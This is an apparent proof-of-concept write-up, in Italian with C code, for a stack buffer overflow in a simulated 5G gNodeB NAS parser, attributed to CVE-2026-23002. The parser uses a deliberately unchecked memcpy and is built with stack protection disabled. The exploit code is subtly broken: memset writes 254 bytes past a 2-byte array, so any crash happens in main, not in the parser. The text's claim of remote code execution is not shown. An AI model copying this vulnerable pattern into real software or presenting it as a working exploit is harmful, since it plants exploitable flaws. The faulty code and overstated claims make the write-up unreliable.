
Parser NAS gNodeB 5G simulato con PoC di stack buffer overflow per CVE-2026-23002; un messaggio NAS appositamente predisposto innesca l'esecuzione remota di codice.
// gnb_nas_sim.c - Simulated 5G gNodeB parsing NAS Registration Request
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#define MAX_IE_SIZE 128
void process_registration_request(uint8_t *nas_msg, uint16_t length) {
uint8_t ie_buffer[MAX_IE_SIZE];
// Read IE length from message; if length > MAX_IE_SIZE, buffer overflow
uint16_t ie_length = (nas_msg[0] << 8) | nas_msg[1];
if (ie_length > 0 && ie_length <= length - 2) {
memcpy(ie_buffer, nas_msg + 2, ie_length); // no bounds check!
printf("IE copied, size %d\n", ie_length);
}
}
int main() {
// Craft a NAS message with an oversized IE length
uint8_t attack[] = {0x01, 0x00}; // IE length = 256, but buffer is only 128 bytes
// Append padding to make length consistent
memset(attack+2, 'A', 254);
process_registration_request(attack, sizeof(attack));
return 0;
}
Il parser del Non‑Access Stratum (NAS) 5G in un gNodeB simulato non riesce a convalidare il campo di lunghezza dell'Information Element. Un attaccante che invia una Registration Request modificata può causare un overflow del buffer di stack, portando all'esecuzione remota di codice sulla stazione base.
Compila ed esegui il parser vulnerabile:
gcc -o gnb_nas_sim gnb_nas_sim.c -fno-stack-protector
./gnb_nas_sim
Il programma va in crash con un segmentation fault (corruzione dello stack).